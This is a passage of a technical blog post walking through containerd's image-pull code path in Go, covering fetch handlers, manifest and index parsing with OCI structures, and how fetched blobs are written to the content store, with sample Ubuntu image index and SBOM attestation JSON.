            <span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">children</span><span class="p">)</span> <span class="o">&gt;</span> <span class="m">0</span> <span class="p">{</span>
                <span class="k">return</span> <span class="n">Dispatch</span><span class="p">(</span><span class="n">ctx2</span><span class="p">,</span> <span class="n">handler</span><span class="p">,</span> <span class="n">limiter</span><span class="p">,</span> <span class="n">children</span><span class="o">...</span><span class="p">)</span> <span class="c">// [5]</span>
            <span class="p">}</span>
        <span class="p">})</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The flow is like:</p>

<p><img src="/assets/image-20260601000000002.png" alt="image-20260601000000002" style="display: block; margin-left: auto; margin-right: auto; zoom:50%;" /></p>

<p><br /></p>

<p>We first analyze <code class="language-plaintext highlighter-rouge">FetchHandler()</code>, the handler that <strong>fetches data from the remote</strong>. The call flow ends up at <code class="language-plaintext highlighter-rouge">Fetch()</code> in <code class="language-plaintext highlighter-rouge">fetcher.go</code> [6].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/containerd/containerd/v2/core/remotes/handlers.go</span>
<span class="k">func</span> <span class="n">FetchHandler</span><span class="p">(</span><span class="n">ingester</span> <span class="n">content</span><span class="o">.</span><span class="n">Ingester</span><span class="p">,</span> <span class="n">fetcher</span> <span class="n">Fetcher</span><span class="p">)</span> <span class="n">images</span><span class="o">.</span><span class="n">HandlerFunc</span> <span class="p">{</span>
    <span class="k">return</span> <span class="k">func</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">desc</span> <span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">)</span> <span class="p">([]</span><span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
        <span class="c">// [...]</span>
        <span class="n">err</span> <span class="o">:=</span> <span class="n">Fetch</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">ingester</span><span class="p">,</span> <span class="n">fetcher</span><span class="p">,</span> <span class="n">desc</span><span class="p">)</span> <span class="c">// &lt;--------</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="k">func</span> <span class="n">Fetch</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">ingester</span> <span class="n">content</span><span class="o">.</span><span class="n">Ingester</span><span class="p">,</span> <span class="n">fetcher</span> <span class="n">Fetcher</span><span class="p">,</span> <span class="n">desc</span> <span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">rc</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">fetcher</span><span class="o">.</span><span class="n">Fetch</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">desc</span><span class="p">)</span> <span class="c">// [6]</span>
    <span class="c">// [...]</span>
    <span class="k">return</span> <span class="n">content</span><span class="o">.</span><span class="n">Copy</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">cw</span><span class="p">,</span> <span class="n">rc</span><span class="p">,</span> <span class="n">desc</span><span class="o">.</span><span class="n">Size</span><span class="p">,</span> <span class="n">desc</span><span class="o">.</span><span class="n">Digest</span><span class="p">)</span>
<span class="p">}</span>
</code></pre></div></div>

<p>This function calls <code class="language-plaintext highlighter-rouge">r.open()</code> to fetch image data from three sources: external URLs [7], the <code class="language-plaintext highlighter-rouge">"manifests"</code> endpoint [8] if the type is index or manifest, and the <code class="language-plaintext highlighter-rouge">"blob"</code> endpoint [9] for the rest of the types.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/containerd/containerd/v2/core/remotes/docker/fetcher.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">r</span> <span class="n">dockerFetcher</span><span class="p">)</span> <span class="n">Fetch</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">desc</span> <span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">)</span> <span class="p">(</span><span class="n">io</span><span class="o">.</span><span class="n">ReadCloser</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="k">return</span> <span class="n">newHTTPReadSeeker</span><span class="p">(</span><span class="n">desc</span><span class="o">.</span><span class="n">Size</span><span class="p">,</span> <span class="k">func</span><span class="p">(</span><span class="n">offset</span> <span class="kt">int64</span><span class="p">)</span> <span class="p">(</span><span class="n">io</span><span class="o">.</span><span class="n">ReadCloser</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
        <span class="c">// [7] firstly try fetch via external urls</span>
        <span class="k">for</span> <span class="n">_</span><span class="p">,</span> <span class="n">us</span> <span class="o">:=</span> <span class="k">range</span> <span class="n">desc</span><span class="o">.</span><span class="n">URLs</span> <span class="p">{</span>
            <span class="c">// [...]</span>
            <span class="n">rc</span><span class="p">,</span> <span class="n">_</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">r</span><span class="o">.</span><span class="n">open</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">req</span><span class="p">,</span> <span class="n">desc</span><span class="o">.</span><span class="n">MediaType</span><span class="p">,</span> <span class="n">offset</span><span class="p">,</span> <span class="no">false</span><span class="p">)</span>
        <span class="p">}</span>

        <span class="c">// [8] Try manifests endpoints for manifests types</span>
        <span class="k">if</span> <span class="n">images</span><span class="o">.</span><span class="n">IsManifestType</span><span class="p">(</span><span class="n">desc</span><span class="o">.</span><span class="n">MediaType</span><span class="p">)</span> <span class="o">||</span> <span class="n">images</span><span class="o">.</span><span class="n">IsIndexType</span><span class="p">(</span><span class="n">desc</span><span class="o">.</span><span class="n">MediaType</span><span class="p">)</span> <span class="p">{</span>
            <span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="n">host</span> <span class="o">:=</span> <span class="k">range</span> <span class="n">r</span><span class="o">.</span><span class="n">hosts</span> <span class="p">{</span>
                <span class="n">req</span> <span class="o">:=</span> <span class="n">r</span><span class="o">.</span><span class="n">request</span><span class="p">(</span><span class="n">host</span><span class="p">,</span> <span class="n">http</span><span class="o">.</span><span class="n">MethodGet</span><span class="p">,</span> <span class="s">"manifests"</span><span class="p">,</span> <span class="n">desc</span><span class="o">.</span><span class="n">Digest</span><span class="o">.</span><span class="n">String</span><span class="p">())</span>
                <span class="c">//[...]</span>
                <span class="c">//[...]</span>
                <span class="n">rc</span><span class="p">,</span> <span class="n">_</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">r</span><span class="o">.</span><span class="n">open</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">req</span><span class="p">,</span> <span class="n">desc</span><span class="o">.</span><span class="n">MediaType</span><span class="p">,</span> <span class="n">offset</span><span class="p">,</span> <span class="n">i</span> <span class="o">==</span> <span class="nb">len</span><span class="p">(</span><span class="n">r</span><span class="o">.</span><span class="n">hosts</span><span class="p">)</span><span class="o">-</span><span class="m">1</span><span class="p">)</span>
            <span class="p">}</span>

            <span class="k">return</span> <span class="no">nil</span><span class="p">,</span> <span class="n">firstErr</span>
        <span class="p">}</span>

        <span class="c">//[9] Finally use blobs endpoints</span>
        <span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="n">host</span> <span class="o">:=</span> <span class="k">range</span> <span class="n">r</span><span class="o">.</span><span class="n">hosts</span> <span class="p">{</span>
            <span class="n">req</span> <span class="o">:=</span> <span class="n">r</span><span class="o">.</span><span class="n">request</span><span class="p">(</span><span class="n">host</span><span class="p">,</span> <span class="n">http</span><span class="o">.</span><span class="n">MethodGet</span><span class="p">,</span> <span class="s">"blobs"</span><span class="p">,</span> <span class="n">desc</span><span class="o">.</span><span class="n">Digest</span><span class="o">.</span><span class="n">String</span><span class="p">())</span>
            <span class="c">// [...]</span>
            <span class="n">rc</span><span class="p">,</span> <span class="n">_</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">r</span><span class="o">.</span><span class="n">open</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">req</span><span class="p">,</span> <span class="n">desc</span><span class="o">.</span><span class="n">MediaType</span><span class="p">,</span> <span class="n">offset</span><span class="p">,</span> <span class="n">i</span> <span class="o">==</span> <span class="nb">len</span><span class="p">(</span><span class="n">r</span><span class="o">.</span><span class="n">hosts</span><span class="p">)</span><span class="o">-</span><span class="m">1</span><span class="p">)</span>
            <span class="c">// [...]</span>
        <span class="p">}</span>

        <span class="c">// [...]</span>
    <span class="p">})</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">open()</code> calls <code class="language-plaintext highlighter-rouge">req.doWithRetries()</code>, which is the function that authenticates and sends the request.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">func</span> <span class="p">(</span><span class="n">r</span> <span class="n">dockerFetcher</span><span class="p">)</span> <span class="n">open</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">req</span> <span class="o">*</span><span class="n">request</span><span class="p">,</span> <span class="n">mediatype</span> <span class="kt">string</span><span class="p">,</span> <span class="n">offset</span> <span class="kt">int64</span><span class="p">,</span> <span class="n">lastHost</span> <span class="kt">bool</span><span class="p">)</span> <span class="p">(</span><span class="n">_</span> <span class="n">io</span><span class="o">.</span><span class="n">ReadCloser</span><span class="p">,</span> <span class="n">_</span> <span class="kt">int64</span><span class="p">,</span> <span class="n">retErr</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">resp</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">req</span><span class="o">.</span><span class="n">doWithRetries</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">lastHost</span><span class="p">,</span> <span class="n">withErrorCheck</span><span class="p">,</span> <span class="n">withOffsetCheck</span><span class="p">(</span><span class="n">offset</span><span class="p">,</span> <span class="n">parallelism</span><span class="p">))</span>
    <span class="c">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>If you’re curious about what the response data looks like, you can find out in the next section.</p>

<h3 id="14-download-manifest--blob">1.4. Download Manifest &amp; Blob</h3>

<p>The next handler is <code class="language-plaintext highlighter-rouge">ChildrenHandler()</code>, and its job is to parse the returned JSON data.</p>

<p>If the descriptor type is a manifest, it expects the JSON to be unmarshalled into <code class="language-plaintext highlighter-rouge">ocispec.Manifest</code> structure [1], and turns the <code class="language-plaintext highlighter-rouge">Config</code> and <code class="language-plaintext highlighter-rouge">Layers</code> fields to descriptors [2]; if the type is an index, the data is unmarshalled to <code class="language-plaintext highlighter-rouge">ocispec.Index</code> structure [3], and the <code class="language-plaintext highlighter-rouge">Manifests</code> field is extracted and returned as descriptors [4].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/containerd/containerd/v2/core/images/handlers.go</span>
<span class="k">func</span> <span class="n">ChildrenHandler</span><span class="p">(</span><span class="n">provider</span> <span class="n">content</span><span class="o">.</span><span class="n">Provider</span><span class="p">)</span> <span class="n">HandlerFunc</span> <span class="p">{</span>
    <span class="k">return</span> <span class="k">func</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">desc</span> <span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">)</span> <span class="p">([]</span><span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">return</span> <span class="n">Children</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">provider</span><span class="p">,</span> <span class="n">desc</span><span class="p">)</span> <span class="c">// &lt;--------</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="c">// vendor/github.com/containerd/containerd/v2/core/images/image.go</span>
<span class="k">func</span> <span class="n">Children</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">provider</span> <span class="n">content</span><span class="o">.</span><span class="n">Provider</span><span class="p">,</span> <span class="n">desc</span> <span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">)</span> <span class="p">([]</span><span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">if</span> <span class="n">IsManifestType</span><span class="p">(</span><span class="n">desc</span><span class="o">.</span><span class="n">MediaType</span><span class="p">)</span> <span class="p">{</span>
        <span class="c">// [...]</span>
        <span class="n">p</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">content</span><span class="o">.</span><span class="n">ReadBlob</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">provider</span><span class="p">,</span> <span class="n">desc</span><span class="p">)</span>
        <span class="k">var</span> <span class="n">manifest</span> <span class="n">ocispec</span><span class="o">.</span><span class="n">Manifest</span> <span class="c">// [1]</span>
        <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">json</span><span class="o">.</span><span class="n">Unmarshal</span><span class="p">(</span><span class="n">p</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">manifest</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
            <span class="c">// [...]</span>
        <span class="p">}</span>
        <span class="c">// [...]</span>
        <span class="k">return</span> <span class="nb">append</span><span class="p">([]</span><span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">{</span><span class="n">manifest</span><span class="o">.</span><span class="n">Config</span><span class="p">},</span> <span class="n">manifest</span><span class="o">.</span><span class="n">Layers</span><span class="o">...</span><span class="p">),</span> <span class="no">nil</span> <span class="c">// [2]</span>

    <span class="p">}</span> <span class="k">else</span> <span class="k">if</span> <span class="n">IsIndexType</span><span class="p">(</span><span class="n">desc</span><span class="o">.</span><span class="n">MediaType</span><span class="p">)</span> <span class="p">{</span>
        <span class="c">// [...]</span>
        <span class="n">p</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">content</span><span class="o">.</span><span class="n">ReadBlob</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">provider</span><span class="p">,</span> <span class="n">desc</span><span class="p">)</span>
        <span class="k">var</span> <span class="n">index</span> <span class="n">ocispec</span><span class="o">.</span><span class="n">Index</span>
        <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">json</span><span class="o">.</span><span class="n">Unmarshal</span><span class="p">(</span><span class="n">p</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">index</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// [3]</span>
            <span class="k">return</span> <span class="no">nil</span><span class="p">,</span> <span class="n">err</span>
        <span class="p">}</span>
        <span class="c">// [...]</span>
        <span class="k">return</span> <span class="nb">append</span><span class="p">([]</span><span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">{},</span> <span class="n">index</span><span class="o">.</span><span class="n">Manifests</span><span class="o">...</span><span class="p">),</span> <span class="no">nil</span> <span class="c">// [4]</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>These structures with <code class="language-plaintext highlighter-rouge">ocispec</code> prefix are defined in the <a href="https://github.com/opencontainers/image-spec">opencontainers</a> repository, and they are based on <strong>OCI (Open Container Initiative)</strong>, a set of open standards that define how containers and container images should be formatted and run so that tools from different vendors can interoperate.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/opencontainers/image-spec/specs-go/v1/index.go</span>
<span class="k">type</span> <span class="n">Index</span> <span class="k">struct</span> <span class="p">{</span>
    <span class="n">specs</span><span class="o">.</span><span class="n">Versioned</span>
    <span class="n">MediaType</span> <span class="kt">string</span> <span class="s">`json:"mediaType,omitempty"`</span>
    <span class="n">ArtifactType</span> <span class="kt">string</span> <span class="s">`json:"artifactType,omitempty"`</span>
    <span class="n">Manifests</span> <span class="p">[]</span><span class="n">Descriptor</span> <span class="s">`json:"manifests"`</span>
    <span class="n">Subject</span> <span class="o">*</span><span class="n">Descriptor</span> <span class="s">`json:"subject,omitempty"`</span>
    <span class="n">Annotations</span> <span class="k">map</span><span class="p">[</span><span class="kt">string</span><span class="p">]</span><span class="kt">string</span> <span class="s">`json:"annotations,omitempty"`</span>
<span class="p">}</span>

<span class="c">// vendor/github.com/opencontainers/image-spec/specs-go/v1/manifest.go</span>
<span class="k">type</span> <span class="n">Manifest</span> <span class="k">struct</span> <span class="p">{</span>
    <span class="n">specs</span><span class="o">.</span><span class="n">Versioned</span>
    <span class="n">MediaType</span> <span class="kt">string</span> <span class="s">`json:"mediaType,omitempty"`</span>
    <span class="n">ArtifactType</span> <span class="kt">string</span> <span class="s">`json:"artifactType,omitempty"`</span>
    <span class="n">Config</span> <span class="n">Descriptor</span> <span class="s">`json:"config"`</span>
    <span class="n">Layers</span> <span class="p">[]</span><span class="n">Descriptor</span> <span class="s">`json:"layers"`</span>
    <span class="n">Subject</span> <span class="o">*</span><span class="n">Descriptor</span> <span class="s">`json:"subject,omitempty"`</span>
    <span class="n">Annotations</span> <span class="k">map</span><span class="p">[</span><span class="kt">string</span><span class="p">]</span><span class="kt">string</span> <span class="s">`json:"annotations,omitempty"`</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Other handlers or decorations are not so much complicated and important — for example, they filter out useless descriptors, only keep the image matching the host architecture — so we skip them here.</p>

<p>One thing is worth to mentioning: you may notice there are two entries for the amd64 image in the index JSON. Actually, only the first one is the <strong>real image data</strong> (cdb…eff). The second one is the <strong>attestation</strong> (01a…169) of the first entry, which is signed metadata that makes a verifiable claim about an artifact.</p>

<div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="w">
    </span><span class="nl">"manifests"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w">
        </span><span class="p">{</span><span class="w">
            </span><span class="nl">"annotations"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
                </span><span class="nl">"com.docker.official-images.bashbrew.arch"</span><span class="p">:</span><span class="w"> </span><span class="s2">"amd64"</span><span class="p">,</span><span class="w">
                </span><span class="nl">"org.opencontainers.image.base.name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"scratch"</span><span class="p">,</span><span class="w">
                </span><span class="nl">"org.opencontainers.image.created"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2026-04-10T00:00:00Z"</span><span class="p">,</span><span class="w">
                </span><span class="nl">"org.opencontainers.image.revision"</span><span class="p">:</span><span class="w"> </span><span class="s2">"a17a2429ff85ab773e86c558a75ae62053ef9936"</span><span class="p">,</span><span class="w">
                </span><span class="nl">"org.opencontainers.image.source"</span><span class="p">:</span><span class="w"> </span><span class="s2">"https://git.launchpad.net/cloud-images/+oci/ubuntu-base"</span><span class="p">,</span><span class="w">
                </span><span class="nl">"org.opencontainers.image.url"</span><span class="p">:</span><span class="w"> </span><span class="s2">"https://hub.docker.com/_/ubuntu"</span><span class="p">,</span><span class="w">
                </span><span class="nl">"org.opencontainers.image.version"</span><span class="p">:</span><span class="w"> </span><span class="s2">"24.04"</span><span class="w">
            </span><span class="p">},</span><span class="w">
            </span><span class="nl">"digest"</span><span class="p">:</span><span class="w"> </span><span class="s2">"sha256:cdb5fd928fced577cfecf12c8966e830fcdf42ee481fb0b91904eeddc2fe5eff"</span><span class="p">,</span><span class="w">
            </span><span class="nl">"mediaType"</span><span class="p">:</span><span class="w"> </span><span class="s2">"application/vnd.oci.image.manifest.v1+json"</span><span class="p">,</span><span class="w">
            </span><span class="nl">"platform"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
                </span><span class="nl">"architecture"</span><span class="p">:</span><span class="w"> </span><span class="s2">"amd64"</span><span class="p">,</span><span class="w">
                </span><span class="nl">"os"</span><span class="p">:</span><span class="w"> </span><span class="s2">"linux"</span><span class="w">
            </span><span class="p">},</span><span class="w">
            </span><span class="nl">"size"</span><span class="p">:</span><span class="w"> </span><span class="mi">424</span><span class="w">
        </span><span class="p">},</span><span class="w">
        </span><span class="p">{</span><span class="w">
            </span><span class="nl">"annotations"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
                </span><span class="nl">"com.docker.official-images.bashbrew.arch"</span><span class="p">:</span><span class="w"> </span><span class="s2">"amd64"</span><span class="p">,</span><span class="w">
                </span><span class="nl">"vnd.docker.reference.digest"</span><span class="p">:</span><span class="w"> </span><span class="s2">"sha256:cdb5fd928fced577cfecf12c8966e830fcdf42ee481fb0b91904eeddc2fe5eff"</span><span class="p">,</span><span class="w">
                </span><span class="nl">"vnd.docker.reference.type"</span><span class="p">:</span><span class="w"> </span><span class="s2">"attestation-manifest"</span><span class="w">
            </span><span class="p">},</span><span class="w">
            </span><span class="nl">"digest"</span><span class="p">:</span><span class="w"> </span><span class="s2">"sha256:01a14a568a5c77390e74eefc7a2106206f4605338cb7e86e8bf06a18452b5169"</span><span class="p">,</span><span class="w">
            </span><span class="nl">"mediaType"</span><span class="p">:</span><span class="w"> </span><span class="s2">"application/vnd.oci.image.manifest.v1+json"</span><span class="p">,</span><span class="w">
            </span><span class="nl">"platform"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
                </span><span class="nl">"architecture"</span><span class="p">:</span><span class="w"> </span><span class="s2">"unknown"</span><span class="p">,</span><span class="w">
                </span><span class="nl">"os"</span><span class="p">:</span><span class="w"> </span><span class="s2">"unknown"</span><span class="w">
            </span><span class="p">},</span><span class="w">
            </span><span class="nl">"size"</span><span class="p">:</span><span class="w"> </span><span class="mi">562</span><span class="w">
        </span><span class="p">}</span><span class="w">
        </span><span class="err">...</span><span class="w">
    </span><span class="p">]</span><span class="w">
</span><span class="p">}</span><span class="w">
</span></code></pre></div></div>

<p>The attestation blob is a pretty large JSON file, and I have no idea about how it’s generated and how to use it 😆. I’ll just leave part of the content below.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>{"_type":"https://in-toto.io/Statement/v0.1","predicateType":"https://spdx.dev/Document","subject":[],"predicate":{"spdxVersion":"SPDX-2.3","dataLicense":"CC0-1.0","SPDXID":"SPDXRef-DOCUMENT","name":"sbom","documentNamespace":"https://docker.com/docker-scout/fs/sbom-6b8f300a-23d8-42b3-9f97-0882a7efe944","creationInfo":{"creators":["Organization: Docker, Inc","Tool: docker-scout-1.18.1","Tool: buildkit-0.16.0-tianon"],"created":"2026-04-15T20:02:39Z"},"packages":[{"name":"sbom","SPDXID":"SPDXRef-DocumentRoot","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","primaryPackagePurpose":"FILE"},{"name":"acl","SPDXID":"SPDXRef-Package-45b9051d819bf7a6bd6a86b0eba5bc45","versionInfo":"2.3.2-1build1.1","supplier":"Person: Ubuntu Developers \\u003cubuntu-devel-discuss@lists.ubuntu.com\\u003e","originator":"Person: Ubuntu Developers \\u003cubuntu-devel-discuss@lists.ubuntu.com\\u003e","downloadLocation":"NOASSERTION","filesAnalyzed":true,"licenseConcluded":"NOASSERTION","licenseDeclared":"GPL-2.0-only OR GPL-2.0-or-later OR LGPL-2.0-or-later OR LGPL-2.1-only","description":"access control list - shared library\n This package contains the shared library containing the POSIX 1003.1e\n draft standard 17 functions for manipulating access control lists.","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:deb/ubuntu/acl@2.3.2-1build1.1?os_distro=noble\u0026os_name=ubuntu\u0026os_version=24.04"}]} ...] ...} ...}
</code></pre></div></div>

<h3 id="15-save-the-file">1.5. Save The File</h3>

<p>Now we know the download flow, but when is the data saved into the filesystem?</p>

<p>After fetching the data, <code class="language-plaintext highlighter-rouge">content.Copy()</code> is called [1] with the writer <code class="language-plaintext highlighter-rouge">cw</code>, the data size <code class="language-plaintext highlighter-rouge">desc.Size</code>, and the hash <code class="language-plaintext highlighter-rouge">desc.Digest</code>.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/containerd/containerd/v2/core/remotes/handlers.go</span>
<span class="k">func</span> <span class="n">Fetch</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">ingester</span> <span class="n">content</span><span class="o">.</span><span class="n">Ingester</span><span class="p">,</span> <span class="n">fetcher</span> <span class="n">Fetcher</span><span class="p">,</span> <span class="n">desc</span> <span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">cw</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">content</span><span class="o">.</span><span class="n">OpenWriter</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">ingester</span><span class="p">,</span> <span class="n">content</span><span class="o">.</span><span class="n">WithRef</span><span class="p">(</span><span class="n">MakeRefKey</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">desc</span><span class="p">)),</span> <span class="n">content</span><span class="o">.</span><span class="n">WithDescriptor</span><span class="p">(</span><span class="n">desc</span><span class="p">))</span>
    <span class="c">// [...]</span>
    <span class="n">rc</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">fetcher</span><span class="o">.</span><span class="n">Fetch</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">desc</span><span class="p">)</span>
    <span class="c">// [...]</span>
    <span class="k">return</span> <span class="n">content</span><span class="o">.</span><span class="n">Copy</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">cw</span><span class="p">,</span> <span class="n">rc</span><span class="p">,</span> <span class="n">desc</span><span class="o">.</span><span class="n">Size</span><span class="p">,</span> <span class="n">desc</span><span class="o">.</span><span class="n">Digest</span><span class="p">)</span> <span class="c">// [1]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The writer object is allocated by <code class="language-plaintext highlighter-rouge">OpenWriter()</code>, which eventually returns a <code class="language-plaintext highlighter-rouge">remoteWriter</code> object [2] with a client backed by a TTRPC stream to <code class="language-plaintext highlighter-rouge">containerd</code>.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/containerd/containerd/v2/core/content/helpers.go</span>
<span class="k">func</span> <span class="n">OpenWriter</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">cs</span> <span class="n">Ingester</span><span class="p">,</span> <span class="n">opts</span> <span class="o">...</span><span class="n">WriterOpt</span><span class="p">)</span> <span class="p">(</span><span class="n">Writer</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">var</span> <span class="p">(</span>
        <span class="n">cw</span>    <span class="n">Writer</span>
        <span class="n">err</span>   <span class="kt">error</span>
        <span class="n">retry</span> <span class="o">=</span> <span class="m">16</span>
    <span class="p">)</span>
    <span class="k">for</span> <span class="p">{</span>
        <span class="n">cw</span><span class="p">,</span> <span class="n">err</span> <span class="o">=</span> <span class="n">cs</span><span class="o">.</span><span class="n">Writer</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">opts</span><span class="o">...</span><span class="p">)</span> <span class="c">// &lt;--------</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
<span class="p">}</span>

<span class="c">// vendor/github.com/containerd/containerd/v2/core/content/proxy/content_store.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">pcs</span> <span class="o">*</span><span class="n">proxyContentStore</span><span class="p">)</span> <span class="n">Writer</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">opts</span> <span class="o">...</span><span class="n">content</span><span class="o">.</span><span class="n">WriterOpt</span><span class="p">)</span> <span class="p">(</span><span class="n">content</span><span class="o">.</span><span class="n">Writer</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">wrclient</span><span class="p">,</span> <span class="n">offset</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">pcs</span><span class="o">.</span><span class="n">negotiate</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">wOpts</span><span class="o">.</span><span class="n">Ref</span><span class="p">,</span> <span class="n">wOpts</span><span class="o">.</span><span class="n">Desc</span><span class="o">.</span><span class="n">Size</span><span class="p">,</span> <span class="n">wOpts</span><span class="o">.</span><span class="n">Desc</span><span class="o">.</span><span class="n">Digest</span><span class="p">)</span>
    <span class="c">// [...]</span>
    <span class="k">return</span> <span class="o">&amp;</span><span class="n">remoteWriter</span><span class="p">{</span> <span class="c">// [2]</span>
